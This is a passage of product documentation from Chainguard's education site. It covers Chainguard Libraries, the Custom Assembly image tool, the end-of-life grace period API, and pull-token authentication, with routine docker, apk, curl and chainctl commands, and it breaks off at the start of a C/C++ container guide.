libraries](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_libraries/) - [chainctl libraries entitlements](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_libraries_entitlements/) - [chainctl libraries entitlements list](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_libraries_entitlements_list/) - [chainctl packages](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_packages/) - [chainctl packages versions](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_packages_versions/) - [chainctl packages versions list](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_packages_versions_list/) - [chainctl update](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_update/) - [chainctl version](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_version/) ### 2 - [How to Install Sigstore Policy Controller](https://edu.chainguard.dev/open-source/sigstore/policy-controller/how-to-install-policy-controller/) - [An Introduction to Rekor](https://edu.chainguard.dev/open-source/sigstore/rekor/an-introduction-to-rekor/) - [An Introduction to Cosign](https://edu.chainguard.dev/open-source/sigstore/cosign/an-introduction-to-cosign/) - [How to Install the Rekor CLI](https://edu.chainguard.dev/open-source/sigstore/rekor/how-to-install-rekor/) - [How to Install Cosign](https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-install-cosign/) - [How to Query Rekor](https://edu.chainguard.dev/open-source/sigstore/rekor/how-to-query-rekor/) - [How to Sign a Container with Cosign](https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-sign-a-container-with-cosign/) - [How to Sign and Upload Metadata to Rekor](https://edu.chainguard.dev/open-source/sigstore/rekor/how-to-sign-and-upload-metadata-to-rekor/) - [How to Sign Blobs and Standard Files with Cosign](https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-sign-blobs-with-cosign/) - [How to Set Up An Instance of Rekor Instance Locally](https://edu.chainguard.dev/open-source/sigstore/rekor/install-a-rekor-instance/) - [What is an SBOM (software bill of materials)?](https://edu.chainguard.dev/open-source/sbom/what-is-an-sbom/) - [How to Sign an SBOM with Cosign](https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-sign-an-sbom-with-cosign/) - [Enforce SBOM attestation with Policy Controller](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/enforce-sbom-attestation-with-policy-controller/) - [Disallowing Non-Default Capabilities](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-non-default-capabilities-with-policy-controller/) - [Disallowing Privileged Pods](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-privileged-containers-with-policy-controller/) - [Disallowing Run as Root User](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-run-as-root-user-with-policy-controller/) - [Maximum Container Image Age](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/maximum-image-age-policy-controller/) - [Disallowing Unsafe sysctls](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-unsafe-sysctls-with-policy-controller/) - [Verify Signed Chainguard Containers](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/using-policy-controller-to-verify-signed-chainguard-images/) - [How to Verify File Signatures with Cosign](https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-verify-file-signatures-with-cosign/) - [Cosign: The Manual Way](https://edu.chainguard.dev/open-source/sigstore/cosign/cosign-manual-way/) - [Limit High or Critical CVEs in your Images Workloads](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/critical-cve-policy/) - [Rego Policies](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/chainguard-enforce-rego-policies/) - [Getting Started with OpenVEX and vexctl](https://edu.chainguard.dev/open-source/sbom/getting-started-openvex-vexctl/) - [melange Overview](https://edu.chainguard.dev/open-source/build-tools/melange/overview/) - [apko Overview](https://edu.chainguard.dev/open-source/build-tools/apko/overview/) - [What Makes a Good SBOM?](https://edu.chainguard.dev/open-source/sbom/what-makes-a-good-sbom/) - [What is OpenVex?](https://edu.chainguard.dev/open-source/sbom/what-is-openvex/) - [The Differences between SBOMs and Attestations](https://edu.chainguard.dev/open-source/sbom/sboms-and-attestations/) - [What is SLSA?](https://edu.chainguard.dev/open-source/slsa/what-is-slsa/) - [apko FAQs](https://edu.chainguard.dev/open-source/build-tools/apko/faq/) - [Example Policies](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/chainguard-enforce-policy-examples/) - [Wolfi Overview](https://edu.chainguard.dev/open-source/wolfi/overview/) - [Getting Started with melange](https://edu.chainguard.dev/open-source/build-tools/melange/getting-started-with-melange/) - [Getting Started with apko](https://edu.chainguard.dev/open-source/build-tools/apko/getting-started-with-apko/) - [Updating bash on macOS](https://edu.chainguard.dev/open-source/update-bash-macos/) - [What is the Open Container Initiative?](https://edu.chainguard.dev/open-source/oci/what-is-the-oci/) - [What are OCI Artifacts?](https://edu.chainguard.dev/open-source/oci/what-are-oci-artifacts/) - [Troubleshooting melange Builds](https://edu.chainguard.dev/open-source/build-tools/melange/troubleshooting/) - [An Introduction to Fulcio](https://edu.chainguard.dev/open-source/sigstore/fulcio/an-introduction-to-fulcio/) - [Building a Wolfi Package](https://edu.chainguard.dev/open-source/wolfi/building-a-wolfi-package/) - [Wolfi FAQs](https://edu.chainguard.dev/open-source/wolfi/faq/) - [Troubleshooting apko Builds](https://edu.chainguard.dev/open-source/build-tools/apko/troubleshooting/) - [Why apk](https://edu.chainguard.dev/open-source/wolfi/apk-package-manager/) - [Hello Wolfi Workshop](https://edu.chainguard.dev/open-source/wolfi/hello-wolfi/) - [Creating Wolfi Images with Dockerfiles](https://edu.chainguard.dev/open-source/wolfi/wolfi-with-dockerfiles/) - [How to Keyless Sign a Container Image with Sigstore](https://edu.chainguard.dev/open-source/sigstore/how-to-keyless-sign-a-container-with-sigstore/) - [How to Generate a Fulcio Certificate](https://edu.chainguard.dev/open-source/sigstore/fulcio/how-to-generate-a-fulcio-certificate/) - [How to Inspect and Verify Fulcio Certificates](https://edu.chainguard.dev/open-source/sigstore/fulcio/how-to-inspect-and-verify-fulcio-certificates/) - [Package Version Selection](https://edu.chainguard.dev/open-source/wolfi/apk-version-selection/) - [Bazel Rules for apko](https://edu.chainguard.dev/open-source/build-tools/apko/bazel-rules/) - [melange FAQs](https://edu.chainguard.dev/open-source/build-tools/melange/faq/) ### 3 - [Introduction to the PCI Data Security Standard (DSS) 4.0](https://edu.chainguard.dev/software-security/compliance/pci-dss-4/intro-pci-dss-4/) - [Introduction to the Cybersecurity Maturity Model Certification (CMMC) 2.0](https://edu.chainguard.dev/software-security/compliance/cmmc-2/intro-cmmc-2/) - [Sea-curing Software #1 - Fighting Vulnerabilities](https://edu.chainguard.dev/software-security/comics/fighting-vulnerabilities/) - [What Are Software Vulnerabilities and CVEs?](https://edu.chainguard.dev/software-security/cves/cve-intro/) - [CMMC 2.0 Maturity Levels](https://edu.chainguard.dev/software-security/compliance/cmmc-2/cmmc-2-levels/) - [Why Care About Software Vulnerabilities?](https://edu.chainguard.dev/software-security/cves/cve-why-care/) - [Overview of PCI DSS 4.0 Practices/Requirements](https://edu.chainguard.dev/software-security/compliance/pci-dss-4/pci-dss-practices/) - [Overview of CMMC 2.0 Practices/Control Groups](https://edu.chainguard.dev/software-security/compliance/cmmc-2/cmmc-practices/) - [Infamous Software Vulnerabilities](https://edu.chainguard.dev/software-security/cves/infamous-cves/) - [Software Vulnerability Remediation](https://edu.chainguard.dev/software-security/cves/cve-remediation/) - [Simplify Your Path to PCI DSS 4.0 Compliance with Chainguard](https://edu.chainguard.dev/software-security/compliance/pci-dss-4/pci-dss-chainguard/) - [Simplify Your Path to CMMC 2.0 Compliance with Chainguard](https://edu.chainguard.dev/software-security/compliance/cmmc-2/cmmc-chainguard/) - [What are Containers?](https://edu.chainguard.dev/software-security/what-are-containers/) - [CISA Secure Software Development Attestation Form (Draft)](https://edu.chainguard.dev/software-security/secure-software-development/ssd-attestation-form/) - [Selecting a Base Container Image](https://edu.chainguard.dev/software-security/selecting-a-base-image/) - [What is software supply chain security](https://edu.chainguard.dev/software-security/what-is-software-supply-chain-security/) - [Chainguard Glossary](https://edu.chainguard.dev/software-security/glossary/) - [WTF happened with the PyPI phishing attack?](https://edu.chainguard.dev/software-security/videos/pypi/) - [WTF is a distroless container?](https://edu.chainguard.dev/software-security/videos/distroless/) - [WTF is a Typo Squatting Attack?](https://edu.chainguard.dev/software-security/videos/github-typosquatting/) - [WTF is Sigstore?](https://edu.chainguard.dev/software-security/videos/sigstore/) - [Secure Software Development Framework (SSDF) Table, NIST SP 800-218](https://edu.chainguard.dev/software-security/secure-software-development/ssdf/) - [Minimum Attestation References](https://edu.chainguard.dev/software-security/secure-software-development/minimum-attestation-references/) - [Overview of CIS Benchmarks](https://edu.chainguard.dev/software-security/compliance/cis-benchmarks/) - [Chainguard Libraries for Python](https://edu.chainguard.dev/software-security/learning-labs/ll202506/) - [Chainguard Libraries for Java](https://edu.chainguard.dev/software-security/learning-labs/ll202505/) - [Chainguard Trademark Use Policy](https://edu.chainguard.dev/software-security/trademark/) --- ## Full Documentation ## Section: 0 ### Vulnerability Information URL: https://edu.chainguard.dev/vulnerabilities/ Last Modified: October 6, 2022 --- ## Section: 1 ### Chainguard Libraries Overview URL: https://edu.chainguard.dev/chainguard/libraries/overview/ Last Modified: April 1, 2025 Tags: Chainguard Libraries, Overview Background Most application development rests on the shoulders of libraries and applications from the open source community. Organizations and application developers consume those libraries as binaries from a collection of sources. Binary versions are produced by individual project maintainers or through continuous integration server setups, and are publicly distributed through various channels. Open source libraries use different distribution services for their binary artifacts. Common examples are the Maven Central Repository for the Java and JVM ecosystem, the npm registry for the JavaScript community, or Python Package Index (PyPI) for the Python community. All ecosystems also include numerous other repositories with lower usage rates, but also often reduced quality, oversight, or security. While convenient, these services remove the direct link from your application to the source code of a specific project, and create a potential risk for quality issues with the artifacts, man-in-the-middle attacks, removal or override of libraries with vulnerable or malicious versions, and other issues. The Supply-chain Levels for Software Artifacts SLSA specification describes these risks and how to protect your software against them. In this common use of open source via binary artifacts you put tremendous trust into the following aspects for the dozen or even hundreds of open source libraries you typically use for each application: Maintainers and specifically release managers of the projects Local workstation or CI setup used for the release build Release process mechanisms to create the binaries Transport of the binaries from the build system to the public repositories Management of access to the repositories Monitoring of repositories for attacks as well as harmful or malicious binaries Traffic to public repositories and attacks on the transport to your infrastructure There are no real guarantees as to the actual provenance of the software code. Repositories also vary greatly in quality and there is no guarantee that the upstream source of a project is available in a repository. In addition, these repositories also hold non-open source binaries of libraries. All these factors create uncertainty. Using these public repositories can feel as opaque as picking up a USB drive off of the sidewalk and plugging its contents into our production environment. Introduction Chainguard Libraries builds all available libraries from source code in the Chainguard Factory and makes them available for you. The Chainguard Factory represents Chainguard’s internal tooling that enables a more secure, dedicated, private, and SLSA-certified build infrastructure for building software from source and publishing the binaries to customers. Chainguard Libraries and the use of the Chainguard Factory remove all software supply chain problems for libraries: Build stage protection - All binary libraries and library versions are built within the trusted Chainguard infrastructure directly from the source code of the official project. Distribution stage protection - Binaries are handled and managed only by Chainguard and made exclusively available for your consumption. Any supply chain attacks at build and distribution are eliminated, since all steps from the source to your use are handled by Chainguard If there is no open source code available, no binaries are made available by Chainguard. This eliminates any license-related risks from commercial libraries. The policy and process to have no binaries without source also removes the danger from malicious artifacts, since these artifacts do not provide source code in public code repositories. Chainguard Libraries is available for the following library ecosystems: Java and the larger Java Virtual Machine (JVM) ecosystem with Chainguard Libraries for Java --- ### Chainguard Custom Assembly URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/ca-docs/custom-assembly/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product Chainguard has created Custom Assembly, a tool that allows users to create customized container images with extra packages added. This enables customers to reduce their risk exposure by creating container images that are tailored to their internal organization and application requirements while still having few-to-zero CVEs. This guide outlines how to build customized Chainguard Containers using Custom Assembly in the Chainguard Console. It includes a brief overview of how Custom Assembly works, as well as its limitations. NOTE: The Custom Assembly tool is currently in its beta phase and it is likely to go through changes before it becomes generally available. About Custom Assembly Custom Assembly is only available to customers that have access to Production Chainguard Containers. Additionally, your account team must enable Custom Assembly before you will be able to begin using it. Contact your account team directly to start the process. When you enable the Custom Assembly tool for your organization, you must select at least one of Chainguard’s application images to serve as the source for your customized container image. For example, if you want to build a custom base for a Python application, you would likely elect to use the Python Chainguard Container as the source for your customized image. After selecting the packages for your customized container image, Chainguard will kick off a build on Chainguard’s infrastructure. Once a customized image is built successfully, Chainguard will take care of its maintenance and rebuild it as necessary, such as when any of the packages in the image are updated. Limitations Custom Assembly only allows you to add packages into a given container image; you cannot remove the packages included in the source application image by default. For example, Chainguard’s Node.js container image comes with packages like nodejs-23, npm, and glibc by default. These packages can’t be removed from a Node.js image using the Custom Assembly tool but you can add other packages into it, and you can remove these added packages in later builds. The packages you can add to a container image are those that your organization already has access to based on the Chainguard Containers you have already purchased. Additionally, you can only add supported versions of packages to a customized image. The changes you make to your customized container image may affect its functional behavior when deployed. Chainguard doesn’t test your final customized image and therefore doesn’t guarantee its functional behavior. Please test your customized images extensively to ensure they meet your requirements. Lastly, while Custom Assembly is in its beta phase it can only be configured from the Chainguard Console. Accessing Customized Containers in the Console To provision a customized container image, reach out to your account team who will configure one for you. Note: This overview highlights using the Chainguard Console’s UI to interact with Custom Assembly Resources. However, you can also interact with Custom Assembly using chainctl, Chainguard’s command-line interface tool, as well as the Chainguard API. After logging in to the Chainguard Console, you will be greeted with your account overview page. If you belong to more than one organization, be sure to select the organization which has Custom Assembly enabled from the drop-down menu in the top-left corner. Click on Organization Containers and scroll or search for the customized container image that was set up by your account team. This will typically have a name that specifies the source container image while also highlighting that it is a customized image, such as python-custom or node-custom. Once you’ve found it, click on the container image. Selecting Packages and Building a Customized Container Clicking on the Custom Assembly container image will take you to its entry in the Console. In the upper right corner of this page, you’ll find a button that says Customize Containers: Click on this button to open a window displaying a list of all of the packages available to be added or removed from your selected container image. This list of packages includes all the packages your organization is entitled to. If there’s a package you’d like to include in your image but it isn’t available in this list, reach out to your account team for access. You can scroll through the list and select or deselect packages to tailor the image to your needs by checking their respective boxes. Alternatively, you can use the search box to filter for the packages you’re looking for. After selecting your chosen packages, click the Preview Changes button to view all the packages you’ve selected for the customized image: If you’d like to make further changes, click the Back button to return to the package selection. If you’re satisfied with the selection of packages, click the Apply Changes button to build the new customized image. You will receive a confirmation message at the top of the Customize Container display letting you know that the image was successfully customized. If a build fails, you’ll need to make the appropriate changes before attempting another build. You can check their logs for information about what went wrong and what to fix. Listing Builds and Viewing Logs You can view a list of all the available builds of your customized container image by clicking the customized image’s Builds tab in the Console: The table in the Builds tab has six columns: ID: A unique identifier representing a specific customized container image build. Version: The container image version the build represents. Status: The status of the given build. When a build is successful, this column will show a green check inside of a circle. When a build has failed, this column will display a red exclamation mark in a triangle. Digest: A unique, content-based hash representing the given container image build. Duration: The amount of time it took to build the container image. Created: How long it’s been since the build was created. Note that if you only recently customized the container image it may take a few minutes for the latest builds to populate. Additionally, builds will only stay listed in the Console for 24 hours. This is because Chainguard Containers, including Custom Assembly container images, are rebuilt frequently and would quickly congest the user interface. You can click on the row of any build listed in the Builds tab to access its logs. This will cause a window to appear from the right where you can get more details about the build, including build failures: Using Customized Containers You can use Docker to download the customized container image for testing or use, like this: docker pull cgr.dev/$ORGANIZATION/$CUSTOMIZED-CONTAINER:latest Be sure to change $ORGANIZATION to reflect the name used for your organization’s private repository within the Chainguard registry and replace $CUSTOMIZED-CONTAINER with the actual name of your container image. Additionally, replace latest with your chosen tag, if different. You can find a list of all the available tags for your customized container in its Versions tab in the Console. Note that you can also download specific builds of an container image by referencing the build’s unique digest, as in this example: docker pull cgr.dev/$ORGANIZATION/$CUSTOMIZED-CONTAINER@sha256:e24d3X4MPL338cb75b3X4MPL3674bd908681fca3X4MPL31e3d0321b892b9611d Pulling container images by digest can improve reproducibility. If you run into any issues with your customized container images or with using the Custom Assembly tool, please reach out to your account team for assistance. Installing packages from a Chainguard private APK repository Chainguard offers Private APK Repositories which you can use to access the apk packages available to your organization. You can use your organization’s private APK repository to further customize your Custom Assembly containers. As an example, run a container with a Custom Assembly container image that has a shell and package manager, such as a -dev variant of a customized container image: docker run -it --entrypoint /bin/sh --user root \ -e "HTTP_AUTH=basic:apk.cgr.dev:user:$(chainctl auth token --audience apk.cgr.dev)" \ cgr.dev/$ORGANIZATION/$CUSTOMIZED-CONTAINER:latest-dev Note that this command injects an HTTP_AUTH environment variable directly into the container by calling chainctl from the host machine to obtain an ephemeral token. This is necessary to authenticate to the private repository. By default, your organization’s private APK repository will be listed in the container’s list of APK repositories: cat /etc/apk/repositories https://apk.cgr.dev/45a0c3X4MPL3977f03X4MPL3ac06a63X4MPL3595 The repository address in this file (which includes a long unpronounceable string) will differ from the one shown in the Console (which reflects the organization name). The string shown in the repositories file is the ID number of the organization. You can confirm this by running the chainctl iam organizations ls -o table command. To search for and install packages from the private APK repository, first the package index: apk update fetch https://apk.cgr.dev/45a0c3X4MPL3977f03X4MPL3ac06a63X4MPL3595/x86_64/APKINDEX.tar.gz [https://apk.cgr.dev/45a0c3X4MPL3977f03X4MPL3ac06a63X4MPL3595] OK: 1019 distinct packages available Then you can search for packages available in your private repo. The following example searches for packages named “mongo”: apk search mongo mongo-5.0-5.0.31-r0 mongo-6.0-6.0.20-r0 mongo-7.0-7.0.16-r0 mongo-8.0-8.0.4-r1 mongod-5.0-5.0.31-r0 mongod-6.0-6.0.20-r0 mongod-7.0-7.0.16-r0 mongod-8.0-8.0.4-r1 Finally, you can install a package with apk: apk add mongo (1/1) Installing mongo-8.0 (8.0.4-r1) Executing busybox-1.37.0-r0.trigger OK: 719 MiB in 78 packages To learn more, refer to our Private APK Repositories documentation. Troubleshooting Build failures can occur for a number of reason, including the following: It’s possible for users to select packages that conflict with each other. For example, if two packages install the same files, Custom Assembly may not be able to resolve the conflict and result in a failed build. Large images taking longer than 1 hour to build will fail with a timeout error. There is a known bug where container images will not be rebuilt if their source image is more than 48 hours In any case, you won’t know whether a container image build fails until after it’s complete. If you need assistance troubleshooting, please reach out to our Customer Support team. Conclusion Custom Assembly allows customers to leverage Chainguard’s build infrastructure to produce container images tailored to their requirements. That means customers no longer have to stand up and maintain their own builds, saving costs in the form of infrastructure, engineering overhead, and complexity. This overview focused on managing Custom Assembly resources through the Chaiguard Console. You can also interact with Custom Assembly using chainctl as well as the Chainguard API. We encourage you to check out our resources on our other Chainguard Containers features, including the following: Unique Tags CVE Visualizations Custom Certificates Additionally, for more information on working with Chainguard Containers, refer to our docs on How to Use Chainguard Containers. --- ### Chainguard End-of-Life Grace Period for Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/eol-gp-overview/ Last Modified: June 11, 2024 Tags: Chainguard Containers, Product Typically, specific versions of software receive updates on a schedule for a set amount of time. Eventually, though, every version of software will stop receiving support. When project maintainers stop providing updates, it’s known as the End-of-Life (EOL) stage. It’s recommended that when a software version reaches the EOL phase, users should migrate their projects to a later version, as EOL software is known to accumulate vulnerabilities. However, there are cases where an organization may want to continue using a container image after it has reached end-of-life. This could be because an image reaches EOL before the organization’s release schedule, or perhaps later image versions have one or more issues that prevent the organization from upgrading. To help in situations like this, Chainguard offers an end-of-life grace period for eligible Containers to all Chainguard Containers customers. This article provides an overview of Chainguard’s EOL grace period, and also includes a brief introduction to using Chainguard’s API to retrieve information about an image’s EOL grace period status. Understanding Chainguard’s EOL Grace Period Chainguard’s EOL grace period gives customers access to new builds of container images whose primary package has entered its end-of-life phase for up to six months after they have reached EOL. During this time, Chainguard will address vulnerabilities and update any non-EOL packages within the container image (other than the image’s primary package). Chainguard will continue to rebuild the image a maximum of six months after the primary package enters its EOL phase or until the build fails. Note: Chainguard is not able to offer any exceptions to the 6 month limit for the EOL grace period. You will be able to find the end date of a given container image version’s grace period in the Chainguard Console. From the Organization Images tab, select an image. You’ll be taken to that container image’s Versions page, and the end date of each grace period will be listed under the respective version: As of this writing, a container image must meet four key requirements to be eligible for coverage under the EOL grace period: It is listed as part of the current available or EOL versions for a version stream package present in our catalog Has multiple release tracks Is within six months of their official EOL date (as declared by upstream project maintainers) Its release and EOL dates are available on the endoflife.date website Be aware that the following are not covered by Chainguard’s EOL grace period: Updating an image’s EOL primary package. Backporting or cherry-picking individual commits or patches to the EOL primary package. Any package labeled end-of-life for more than 6 months by its open-source creators or maintainers. Additionally, if a container image fails to build because underlying dependencies conflict with the primary package, it will no longer be supported. A failed build signals the end of support for that image. If a dependency conflict prevents an image version from building successfully, the grace period will end immediately for that version. Chainguard will not attempt further updates or CVE remediations after a build failure. Additionally, If a container image fails to build due to dependency conflicts, its grace period ends immediately. This means no further updates or CVE remediations will be provided for that image version. After a grace period ends, your organization will retain access to the last successful build of the image. Chainguard will stop providing updates and CVE remediations; although the image will remain usable, it won’t receive any ongoing security maintenance. Once an image’s grace period has ended, we strongly recommend upgrading to a supported version as soon as possible. Planning for and managing an EOL grace period lifecycle To maximize the value of a grace period, we recommend the following: Before the grace period starts: Identify all dependent applications and services using the container image Create an upgrade plan with realistic timelines Document any known issues or compatibility requirements Set up monitoring for the container images During the grace period: Test newer versions of the image in a development environment Track and resolve any compatibility issues Begin deploying updated versions to non-critical environments Monitor for any build failures or dependency conflicts Before expiration: Complete all necessary testing of the new version Schedule the production upgrade Document any configuration changes needed Prepare rollback procedures if needed Using the EOL Grace Period API Although the Chainguard Console is a useful interface, many customers would prefer to integrate EOL data with their preferred tools for faster, more convenient monitoring. For this reason, Chainguard has developed an API to serve customers with EOL data sufficient for monitoring the lifecycle of their images. The API endpoint you can reach for EOL data is Registry_ListEolTags. This section outlines how you can use curl to make a call to this API endpoint. To follow along, you’ll need to know the unique ID path (UIDP) of the container image repository you’d like to retrieve end-of-life data for. You can find this with the following chainctl command: chainctl images repos list --parent $ORGANIZATION -o wide Replace $ORGANIZATION with the name of your organization. This command will return a table showing the UIDPs of every Chainguard Container the specified organization has access to: ID | REGISTRY | REPO | BUNDLES | TIER -----------------------------------+---------------------+----------+-----------------------+-------------- ORGANIZATION_ID/165aEXAMPLE5b7ae | cgr.dev/example.com | nginx | application, featured | APPLICATION ORGANIZATION_ID/4408EXAMPLE4131a | cgr.dev/example.com | node | base | UNKNOWN ORGANIZATION_ID/37a2EXAMPLE0d419 | cgr.dev/example.com | python | base, featured | UNKNOWN With the image repository ID, you can make a request to the API endpoint with a command like the following. Make sure to replace $ORGANIZATION_ID/4408EXAMPLE4131a with the container image repository UIDP you just found: curl -H "Authorization: Bearer $(chainctl auth token)" https://console-api.enforce.dev/registry/v1/eoltags?uidp.childrenOf=$ORGANIZATION_ID/4408EXAMPLE4131a | jq . Note that this example includes the -H argument to pass an authorization header to the API. This header is constructed with the chainctl auth token command which prints the local Chainguard token, allowing you to authenticate to the API. It also pipes the curl command’s output into jq, a lightweight JSON processor, in order to make it easier to read. This command will return EOL data for each image within the repository, which will be delivered in the following format: { "items": [ . . . { "id": "ORGANIZATION_ID/4408EXAMPLE4131a/9ef6EXAMPLE6265c", "name": "18.20.8-slim", "mainPackageName": "nodejs", "tagStatus": "TAG_IN_GRACE", "mainPackageVersion": { "eolDate": "2025-04-30", "exists": true, "fips": false, "lts": "2022-10-25", "releaseDate": "2022-04-19", "version": "18", "eolBroken": false }, "graceStatus": "GRACE_ACTIVE", "gracePeriodExpiryDate": "2025-10-30T00:00:00Z" }, . . . ] } This example output is derived from an API call made on a node image repository, and the data returned presents a lot of useful information, some of which is highlighted here: id: this is the UID of the specific image this block of data represents name: the given container image’s tag tagStatus: whether the tag can support a grace period, with the following possible statuses: TAG_ACTIVE: the tag is continuing to be built, but is not in a grace period TAG_IN_GRACE: tag is in a grace period TAG_INACTIVE: the tag is not in a grace period and no longer being built mainPackageVersion: this section shows some information about the main package itself: eolDate: the date on which the image’s main package reached EOL lts: the date on which this version of the main package entered its long-term support period releaseDate: the date on which the main package’s version was released graceStatus: the status of whether or not the given container image is in an active grace period GRACE_ACTIVE, as shown in this example, indicates the image is in an active grace period any images that are not currently in a grace period but may be in the future will show GRACE_ELIGIBLE any container images that will never enter a grace period will show GRACE_NOT_ELIGIBLE gracePeriodExpiryDate: the date on which the image’s grace period will end Of course, you won’t use curl to interact with the Chainguard API in most scenarios. Instead, you’ll likely have some kind of application that can ingest and process this EOL data. For example, your organization could create a Slackbot that fetches data from the Chainguard EOL grace period API and posts messages about EOL tags approaching their grace period expiration to a specified Slack channel. Chainguard’s API documentation includes request samples for many languages and platforms, including Go, Python, and Java. Learn More Chainguard’s EOL grace period gives customers the opportunity to continue to receive best-effort CVE remediated updates on EOL images, while they work on transitioning to a newer upstream version. For more information on the EOL grace period, please contact us. Additionally, our doc outlining the Chainguard Containers Product Release Lifecycle can be helpful for understanding Chainguard’s approach to updates, releases, and versions within Chainguard Containers. Finally, our conceptual article on How End-of-Life Software Accumulates Vulnerabilities is helpful for understanding the risk involved with using end-of-life software by outlining how EOL images accrue vulnerabilities and where they accumulate. --- ### Chainguard Libraries Access URL: https://edu.chainguard.dev/chainguard/libraries/access/ Last Modified: April 7, 2025 Tags: Chainguard Libraries, Overview Access to Chainguard Libraries is consistent across all permissions and accounts of the Chainguard platform. If you are not a Chainguard user yet, a new Chainguard account must be created and configured for access to Chainguard Libraries. If you are already a Chainguard user, the Chainguard account owner in your organization can grant access to Chainguard Libraries. In both cases, confirm the name of the organization so you can use it with the --parent parameter to specify the organization. Initial authentication Once your user account is created and access is confirmed, install the Chainguard Control chainctl command line tool and login to your account: chainctl auth login After authentication in a browser window, a successful login displays a message and a token: Successfully exchanged token. Valid! Id: 8a4141a........7d9904d98c Pull token for libraries Retrieve a new authentication token for the Chainguard Libraries for Java with the chainctl auth pull-token command: chainctl auth pull-token --library-ecosystem=java --parent=example --ttl=8670h --library-ecosystem=java: retrieve the token for use with Chainguard Libraries for Java. Use python for a token to use Chainguard Libraries for Python. --parent=example: specify the parent organization for your account as provided when requesting access to Chainguard Libraries and replace example. --ttl=8670d: set the duration for the validity of the token, defaults to 720h (equivalent to 30 days), maximum valid value is 8760h (equivalent to 365 days), valid unit strings range from nanoseconds to hours and are ns, us, ms, s, m, and h. When omitting the parent parameter, potentially a list of organizations is displayed. Use the arrow keys to navigate the selection displayed after the question “With which location is the pull token associated?” and select the organization that has the entitlement to access Chainguard Libraries for Java. Press / to filter the list. chainctl returns a username and password suitable for basic authentication in the response: Username: 45a.....424eb0 Password: eyJhbGciO..........WF0IjoxN The returned username and password combination is a new credential set in the organization that is independent of the account used to create and retrieve the credential set. It is therefore suitable for use in any service application, such as a repository manager or a build tool that is not tied to a specific user. To use this pull token in another environment, supply the following for username and password valid for basic authentication. Note that the actual returned values are much longer. Verification Use the credentials for manual testing in a browser or with a script and curl if you know the URL for a specific library artifact. Refer to the following sections for more details: Technical details and manual testing for Java libraries Technical details and manual testing for Python libraries Use environment variables .netrc for authentication Use environment variables Using environment variables for username and password is more secure than hardcoding the values in configuration files. In addition, you can use the same configuration and files for all users to simplify setup and reduce errors. Use the env environment output option to create a snippet for a new token suitable for integration in a script. $ chainctl auth pull-token --output env --library-ecosystem=java --parent=example export CHAINGUARD_JAVA_IDENTITY_ID=45a.....424eb0 export CHAINGUARD_JAVA_TOKEN=eeyJhbGciO..........WF0IjoxN Combine the call with eval to populate the environment variables directly by calling chainctl: eval $(chainctl auth pull-token --output env --library-ecosystem=java --parent=example) Equivalent commands for Python are supported and result in values for the CHAINGUARD_PYTHON_IDENTITY_ID and CHAINGUARD_PYTHON_TOKEN variables. Running this command as part of a login script or some other automation allows your organization to replace actual username and password values in your build tool configuration with environment variable placeholders: Java build tool configuration Python build tool configuration .netrc for authentication curl and a number of other tools support configuration of username and password authentication details for a specific domain in the .netrc file, typically located in the user’s home directory. Use this approach for authentication to a repository manager in your organization or to Chainguard Libraries directly, for example with pip and others for Chainguard Libraries for Python, with bazel for Chainguard Libraries for Java or for manual testing with curl. The following example shows a suitable setup for a repo manager available at repo.example.com: machine repo.example.com login YOUR_USERNAME_FOR_REPOSITORY_MANAGER password YOUR_PASSWORD For a direct connection to Chainguard Libraries, for example for testing with curl, use the following example with the username CHAINGUARD_PYTHON_IDENTITY_ID and password CHAINGUARD_PYTHON_TOKEN value for the pull token for the desired language ecosystem: machine libraries.cgr.dev login CHAINGUARD_PYTHON_IDENTITY_ID password CHAINGUARD_PYTHON_TOKEN Note that the long string for the password value must use only one line. Verify entitlement You can verify entitlements for your organization example with the following command: chainctl libraries entitlements list --parent=example The output must include the desired ecosystem in the table: Ecosystem Library Entitlements for example (45a0...764595) ID | ECOSYSTEM ------------------------------------------------------------+------------ 45a....................................................e1 | JAVA 45a....................................................x6 | PYTHON Contact your Chainguard account owner for confirmation or adjustments if necessary. --- ### Getting Started with the C/C++ Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/c/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product C and its derivative, C++, are two widely adopted compiled languages. Chainguard offers a variety of minimal, low-CVE container images built on the Wolfi un-distro which are suitable for deploying C-based compiled programs. In this guide, you will explore three ways you can use Chainguard Containers to compile and run a C-based binary. The container image with which you choose to run your compiled program depends on the nature of your binaries. Static binaries can be executed in the minimal static Chainguard Container, while dynamically linked binaries can be run in the glibc-dynamic Container. For this demonstration, you will first compile a C binary using the gcc-glibc Chainguard Container, and then learn how to use a multi-stage build to run the resulting binary in the glibc-dynamic image. You’ll also cover an example showing the multi-stage build process for the C++ programming language. To learn more about the differences between these container images, read our article on Choosing an Container for your Compiled Programs. What is distroless? Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi? Wolfi is a community Linux undistro created specifically for containers. This 